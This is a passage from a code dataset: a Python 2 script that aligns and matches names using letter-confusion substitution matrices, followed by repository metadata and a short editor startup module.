# [ 2, 1, 1, 1, 2, 1, 26, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 2, 1, 1, 1, 9, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 2, 1, 1, 1, 4, 1, 5, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 12, 1, 2, 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 2, 1, 2, 1, 1, 1, 1, 1, 2, 2, 1, 2, 1, 1, 1, 1, 26, 4, 1, 1, 1, 1, 1, 1 ],
# [ 2, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 26, 1, 1, 2, 1, 1, 12, 5, 6, 1, 1, 1 ],
# [ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 2, 1, 1, 1, 5, 1, 1, 1, 26, 1, 1, 2, 1, 2, 1, 1, 1, 2, 1, 2, 2, 1, 1, 1, 6, 1 ],
# [ 3, 2, 1, 1, 2, 1, 1, 1, 1, 3, 1, 1, 1, 1, 1, 1, 1, 1, 17, 1, 1, 1, 1, 1, 1, 26 ]
# ]
#
# improvedMatrix_300 = [
# [ 2339, 13, 10, 5, 113, 0, 2, 8, 123, 0, 3, 17, 2, 13, 210, 2, 0, 19, 148, 4, 202, 3, 3, 0, 34, 0 ],
# [ 8, 448, 0, 0, 4, 0, 0, 0, 1, 0, 0, 0, 0, 0, 3, 0, 0, 0, 3, 0, 7, 0, 8, 0, 0, 0 ],
# [ 0, 0, 3, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0 ],
# [ 1, 0, 0, 652, 19, 0, 2, 0, 1, 1, 2, 1, 0, 2, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 182, 0, 3, 3, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 2, 0, 0, 0, 9, 0, 413, 0, 3, 0, 0, 2, 0, 1, 1, 0, 2, 2, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 8, 0, 0, 0, 80, 0, 0, 270, 0, 0, 0, 2, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 1, 0, 0, 0, 10, 0, 24, 0, 2, 150, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 10, 0, 252, 0, 29, 0, 0, 0, 3, 0, 432, 3, 0, 1, 7, 0, 34, 6, 0, 0, 10, 0, 0, 11, 0, 0 ],
# [ 10, 3, 3, 3, 21, 0, 0, 0, 8, 0, 2, 822, 0, 0, 5, 0, 0, 2, 3, 9, 1, 0, 0, 0, 0, 0 ],
# [ 10, 0, 0, 0, 12, 0, 0, 0, 2, 0, 0, 0, 617, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0 ],
# [ 3, 0, 0, 13, 17, 0, 15, 0, 6, 0, 3, 2, 1, 1428, 5, 0, 0, 4, 1, 8, 0, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 1, 0, 0, 0, 10, 0, 0, 0, 3, 0, 0, 5, 0, 0, 2, 227, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 5, 5, 5, 0, 25, 0, 3, 3, 10, 0, 1, 1, 1, 2, 7, 1, 0, 1081, 1, 1, 4, 0, 0, 0, 0, 2 ],
# [ 4, 2, 67, 0, 25, 3, 0, 2, 0, 0, 18, 12, 7, 9, 6, 18, 1, 0, 779, 81, 1, 0, 0, 16, 0, 1 ],
# [ 11, 0, 1, 0, 36, 0, 1, 10, 6, 12, 0, 5, 0, 0, 12, 0, 0, 12, 1, 659, 8, 0, 0, 0, 0, 2 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 11, 4, 2, 0, 46, 1, 0, 1, 8, 0, 1, 13, 3, 3, 935, 3, 1, 18, 7, 6, 418, 160, 186, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 62, 10, 17, 7, 219, 1, 4, 0, 1317, 6, 7, 31, 10, 50, 1, 4, 0, 13, 24, 23, 41, 19, 2, 0, 321, 6 ],
# [ 3, 0, 0, 0, 12, 0, 0, 0, 0, 4, 0, 0, 1, 0, 0, 0, 0, 4, 94, 0, 0, 0, 0, 3, 0, 128 ]
# ]
# improvedMatrix_500 = [
# [ 3819, 11, 12, 17, 182, 1, 7, 12, 216, 0, 2, 19, 3, 34, 398, 2, 0, 24, 220, 2, 340, 1, 4, 0, 46, 0 ],
# [ 9, 710, 0, 0, 8, 0, 0, 0, 4, 0, 0, 2, 0, 0, 1, 0, 0, 0, 1, 0, 13, 0, 3, 0, 0, 0 ],
# [ 0, 0, 2, 0, 0, 0, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 1097, 23, 0, 2, 0, 3, 1, 1, 1, 0, 2, 2, 0, 0, 2, 0, 0, 1, 0, 4, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 2, 285, 0, 5, 1, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0 ],
# [ 1, 2, 0, 0, 14, 0, 668, 0, 4, 0, 2, 6, 0, 4, 8, 0, 4, 3, 0, 1, 0, 0, 0, 0, 0, 0 ],
# [ 22, 0, 0, 0, 111, 0, 0, 442, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 1, 0, 0, 0, 8, 0, 42, 0, 2, 233, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 8, 0, 406, 0, 32, 0, 0, 0, 8, 0, 763, 3, 0, 1, 10, 0, 60, 4, 0, 0, 14, 0, 0, 16, 0, 0 ],
# [ 20, 3, 1, 0, 40, 0, 0, 0, 11, 0, 2, 1428, 0, 1, 14, 0, 0, 4, 7, 2, 2, 0, 0, 0, 0, 0 ],
# [ 16, 0, 0, 0, 17, 0, 0, 0, 4, 0, 0, 0, 1021, 2, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0 ],
# [ 16, 1, 5, 13, 47, 0, 30, 0, 9, 0, 2, 2, 4, 2215, 2, 0, 0, 5, 7, 11, 0, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 1, 0, 0, 0, 15, 0, 0, 0, 5, 0, 0, 4, 0, 0, 9, 429, 0, 2, 0, 0, 2, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 11, 2, 7, 0, 30, 0, 1, 1, 19, 0, 1, 2, 0, 7, 12, 2, 0, 1897, 3, 1, 3, 0, 0, 0, 2, 2 ],
# [ 7, 7, 95, 0, 52, 4, 1, 6, 0, 0, 19, 24, 10, 4, 5, 30, 0, 0, 1277, 122, 0, 0, 3, 28, 0, 0 ],
# [ 22, 0, 0, 0, 44, 0, 3, 14, 21, 5, 0, 3, 0, 0, 19, 0, 0, 21, 9, 1159, 10, 0, 0, 0, 0, 1 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 24, 9, 5, 5, 56, 4, 4, 2, 11, 0, 0, 31, 7, 6, 1612, 3, 3, 30, 11, 9, 681, 275, 309, 0, 3, 2 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 83, 8, 33, 11, 398, 2, 7, 2, 2216, 4, 9, 43, 12, 104, 5, 5, 0, 14, 46, 31, 65, 28, 5, 0, 512, 6 ],
# [ 5, 2, 0, 0, 12, 0, 1, 0, 0, 6, 1, 0, 4, 0, 0, 0, 0, 2, 174, 0, 0, 0, 0, 3, 0, 230 ]
# ]
improvedMatrix_500_Modified = [
[ 26, 1, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 1, 1, 4, 1, 1, 1, 2, 1, 3, 1, 1, 1, 1, 1 ],
[ 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 4, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 3, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 26, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 1, 2, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 2, 1, 1, 1, 7, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 1, 2, 1, 6, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 14, 1, 2, 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 3, 1, 1, 1, 1, 1, 1, 2, 1, 1 ],
[ 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 3, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 26, 3, 1, 1, 1, 2, 1, 1 ],
[ 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 12, 5, 6, 1, 1, 1 ],
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
[ 2, 1, 1, 1, 5, 1, 1, 1, 26, 1, 1, 1, 1, 2, 1, 1, 1, 1, 2, 1, 2, 1, 1, 1, 7, 1 ],
[ 2, 1, 1, 1, 2, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 20, 1, 1, 1, 1, 1, 1, 26 ]
]
improvedMatrix_800 = [
[ 6074, 22, 19, 15, 293, 1, 7, 20, 369, 0, 5, 28, 8, 38, 628, 1, 0, 58, 357, 15, 517, 4, 10, 0, 109, 2 ],
[ 10, 1176, 0, 0, 18, 0, 0, 0, 10, 0, 0, 6, 0, 1, 6, 0, 0, 0, 0, 0, 16, 0, 5, 0, 0, 0 ],
[ 0, 0, 3, 0, 0, 0, 0, 13, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0 ],
[ 2, 0, 0, 1735, 39, 0, 2, 0, 1, 1, 0, 1, 0, 1, 4, 0, 0, 1, 0, 2, 3, 0, 3, 0, 0, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 3, 486, 0, 7, 3, 2, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0 ],
[ 6, 4, 0, 0, 35, 0, 1053, 0, 6, 0, 0, 24, 0, 7, 3, 0, 9, 4, 0, 2, 0, 0, 0, 0, 0, 0 ],
[ 29, 0, 0, 0, 200, 0, 0, 703, 0, 0, 0, 4, 0, 0, 0, 0, 0, 2, 0, 0, 2, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 1, 0, 0, 0, 12, 0, 59, 0, 4, 364, 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 20, 0, 656, 0, 63, 0, 0, 0, 15, 0, 1214, 5, 0, 3, 25, 0, 125, 12, 0, 0, 35, 0, 1, 40, 0, 0 ],
[ 31, 2, 1, 2, 72, 0, 0, 0, 15, 0, 2, 2118, 0, 1, 22, 0, 0, 4, 11, 4, 2, 0, 0, 0, 0, 0 ],
[ 22, 0, 0, 0, 20, 0, 0, 0, 5, 0, 0, 0, 1676, 2, 3, 4, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0 ],
[ 24, 2, 1, 10, 99, 0, 41, 0, 21, 0, 9, 3, 2, 3617, 6, 0, 0, 3, 9, 17, 0, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 10, 0, 0, 0, 28, 0, 0, 0, 5, 0, 0, 3, 0, 0, 17, 694, 0, 5, 0, 0, 2, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 34, 2, 10, 0, 39, 0, 6, 8, 35, 0, 6, 6, 2, 14, 29, 4, 0, 3000, 1, 2, 8, 0, 0, 0, 4, 5 ],
[ 13, 12, 146, 0, 86, 7, 3, 10, 9, 0, 32, 34, 17, 15, 7, 63, 2, 3, 2013, 174, 2, 0, 3, 57, 0, 2 ],
[ 35, 0, 3, 0, 58, 0, 8, 20, 27, 14, 0, 2, 0, 0, 32, 0, 0, 31, 11, 1810, 15, 0, 0, 0, 0, 4 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 32, 14, 8, 6, 93, 2, 5, 6, 18, 0, 8, 32, 5, 30, 2620, 4, 10, 62, 21, 20, 1021, 455, 467, 1, 6, 2 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 124, 18, 40, 34, 597, 5, 27, 1, 3431, 15, 12, 76, 17, 151, 16, 5, 0, 36, 76, 57, 108, 47, 22, 0, 857, 26 ],
[ 12, 3, 0, 0, 30, 0, 3, 0, 0, 9, 5, 0, 3, 0, 0, 0, 0, 2, 280, 0, 0, 0, 0, 6, 0, 378 ]
]
improvedMatrix_1000 = [
[ 7595, 26, 33, 17, 347, 2, 7, 35, 482, 0, 8, 44, 8, 41, 759, 6, 0, 75, 442, 28, 663, 7, 8, 0, 106, 2 ],
[ 18, 1483, 0, 0, 21, 0, 0, 0, 4, 0, 0, 4, 0, 3, 6, 0, 0, 0, 1, 0, 19, 0, 12, 0, 0, 0 ],
[ 0, 0, 11, 0, 0, 0, 0, 27, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0 ],
[ 3, 0, 0, 2126, 62, 0, 4, 0, 2, 0, 0, 2, 0, 3, 4, 0, 0, 2, 0, 4, 1, 0, 1, 0, 0, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 1, 610, 0, 9, 3, 1, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 6, 0, 0, 0, 0 ],
[ 5, 3, 0, 0, 31, 0, 1359, 0, 9, 0, 2, 11, 0, 9, 6, 0, 10, 5, 0, 3, 0, 0, 0, 0, 0, 0 ],
[ 46, 0, 0, 0, 264, 0, 0, 901, 0, 0, 0, 2, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 18, 0, 90, 0, 2, 478, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 23, 0, 830, 0, 81, 0, 0, 0, 18, 0, 1485, 7, 0, 5, 26, 0, 131, 16, 0, 0, 26, 0, 2, 37, 0, 0 ],
[ 41, 3, 2, 5, 75, 0, 0, 0, 20, 0, 4, 2698, 0, 4, 25, 0, 0, 3, 19, 8, 1, 3, 0, 0, 0, 0 ],
[ 40, 0, 0, 0, 36, 0, 0, 0, 9, 0, 0, 0, 2002, 2, 2, 5, 0, 0, 0, 0, 0, 0, 0, 0, 7, 0 ],
[ 18, 3, 9, 23, 134, 0, 46, 0, 23, 0, 12, 4, 8, 4662, 9, 0, 0, 4, 1, 22, 0, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 14, 0, 0, 0, 37, 0, 0, 0, 9, 0, 0, 10, 0, 0, 10, 842, 0, 5, 0, 0, 3, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 37, 5, 9, 0, 65, 0, 5, 7, 46, 0, 11, 4, 1, 12, 25, 2, 0, 3714, 2, 2, 13, 0, 0, 0, 4, 5 ],
[ 15, 12, 216, 0, 94, 4, 5, 8, 10, 0, 43, 49, 26, 14, 11, 69, 2, 4, 2590, 233, 1, 0, 2, 57, 0, 3 ],
[ 49, 0, 5, 0, 107, 0, 3, 29, 24, 20, 0, 4, 0, 0, 43, 0, 0, 42, 14, 2240, 15, 0, 0, 0, 0, 7 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 38, 12, 8, 2, 120, 6, 6, 9, 26, 0, 5, 59, 20, 35, 3162, 10, 10, 64, 26, 18, 1340, 557, 619, 2, 3, 4 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 165, 22, 53, 44, 807, 3, 20, 10, 4348, 14, 19, 85, 28, 200, 21, 9, 0, 38, 110, 80, 132, 63, 17, 0, 1101, 23 ],
[ 17, 4, 0, 0, 40, 0, 5, 0, 0, 11, 6, 0, 7, 0, 0, 0, 0, 5, 341, 0, 0, 0, 0, 10, 0, 427 ]
]
# f4.close()
pNames = f2.readlines()
lNames = f3.readlines()
# ori_blosum62 = [[ ori_blosum62[ row ][ col ]+4 for col in range(26)] for row in range(26) ]
letter_empty_average = [[0 for col in range(1)] for row in range(26)]
for i in range(26):
letter_empty_average[ i ] = ( min(improvedMatrix_500_Modified[i]) + max(improvedMatrix_500_Modified[i]))/2
for pName in pNames:
maxDistance = -10000
matchName = ""
pName = pName.replace(pName," "+pName)
index = pName.find('\t')
pName = pName[0:index]
pName = pName.lower()
for lName in lNames:
lName = lName.replace(lName," "+lName)
index = lName.find('\n')
lName = lName[0:index]
#Initiate the First Row & Column in Distance Array:
lenP = len( pName )
lenL = len( lName )
distanceG = [[0 for i in range(lenL) ] for i in range(lenP)]
distanceG[ 0 ][ 0 ] = 0
for i in range(1,lenL):
x = ord( lName[ i ] ) - 97
if x<0:
x = 0
distanceG[ 0 ][ i ] = distanceG[ 0 ][ i-1 ] - letter_empty_average[ x ]
for i in range(1,lenP):
x = ord( pName[i] ) - 97
if x<0:
x = 0
distanceG[ i ][ 0 ] = distanceG[ i-1 ][ 0 ] - letter_empty_average[ x ]
for i in range(1,lenP):
x = ord( pName[i] ) - 97
if x < 0:
x = 0
for j in range(1,lenL):
y = ord( lName[j] ) - 97
if y < 0:
y = 0
if pName[ i ] == lName[ j ]:
distanceG[ i ][ j ] = max(
distanceG[ i-1 ][ j-1 ] + improvedMatrix_500_Modified[ y ][ x ],
distanceG[ i-1 ][ j ] - letter_empty_average[ x ],
distanceG[ i ][ j-1 ] - letter_empty_average[ y ]
)
else:
distanceG[ i ][ j ] = max(
distanceG[ i-1 ][ j-1 ] + improvedMatrix_500_Modified[ y ][ x ] - improvedMatrix_500_Modified[ y ][ y ],
distanceG[ i-1 ][ j ] - letter_empty_average[ x ],
distanceG[ i ][ j-1 ] - letter_empty_average[ y ]
)
if distanceG[ lenP-1 ][ lenL-1 ] > maxDistance:
maxDistance = distanceG[ lenP-1 ][ lenL-1 ]
matchName = lName
matchName = matchName[1:]
pName = pName[1:].upper()
print pName+ "\t" + matchName,maxDistance
f8.write(pName+ "\t" + matchName + "\n")
f8.close()
# Close the Files:
f1.close()
f2.close()
f3.close()
| 73.431438 | 165 | 0.30051 | 7,645 | 43,912 | 1.71877 | 0.054284 | 0.28965 | 0.35411 | 0.408524 | 0.676484 | 0.612405 | 0.567047 | 0.52382 | 0.500989 | 0.486834 | 0 | 0.339161 | 0.502391 | 43,912 | 597 | 166 | 73.554439 | 0.262185 | 0.491141 | 0 | 0.172973 | 0 | 0.021622 | 0.023821 | 0.022782 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.027027 | null | null | 0.005405 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
fadc39c0ad2266424d5b250dfc65be4ebcc5caa2 | 125 | py | Python | editor/lib/juma/__init__.py | RazielSun/juma-editor | 125720f7386f9f0a4cd3466a45c883d6d6020e33 | [
"MIT"
] | null | null | null | editor/lib/juma/__init__.py | RazielSun/juma-editor | 125720f7386f9f0a4cd3466a45c883d6d6020e33 | [
"MIT"
] | null | null | null | editor/lib/juma/__init__.py | RazielSun/juma-editor | 125720f7386f9f0a4cd3466a45c883d6d6020e33 | [
"MIT"
] | 1 | 2022-03-31T00:50:23.000Z | 2022-03-31T00:50:23.000Z | from core import *
##----------------------------------------------------------------##
def startup():
startupTool( None )
| 20.833333 | 68 | 0.312 | 7 | 125 | 5.571429 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096 | 125 | 5 | 69 | 25 | 0.345133 | 0.512 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
87be7b64ed70b08a69f6bbb9fa0965a3fa2e07a0 | 4,590 | py | Python | tests/riscv/_rv32_fctrl.py | noahsherrill/force-riscv | 500cec3017f619dbf853a497bf02eaeecca927c9 | [
"Apache-2.0"
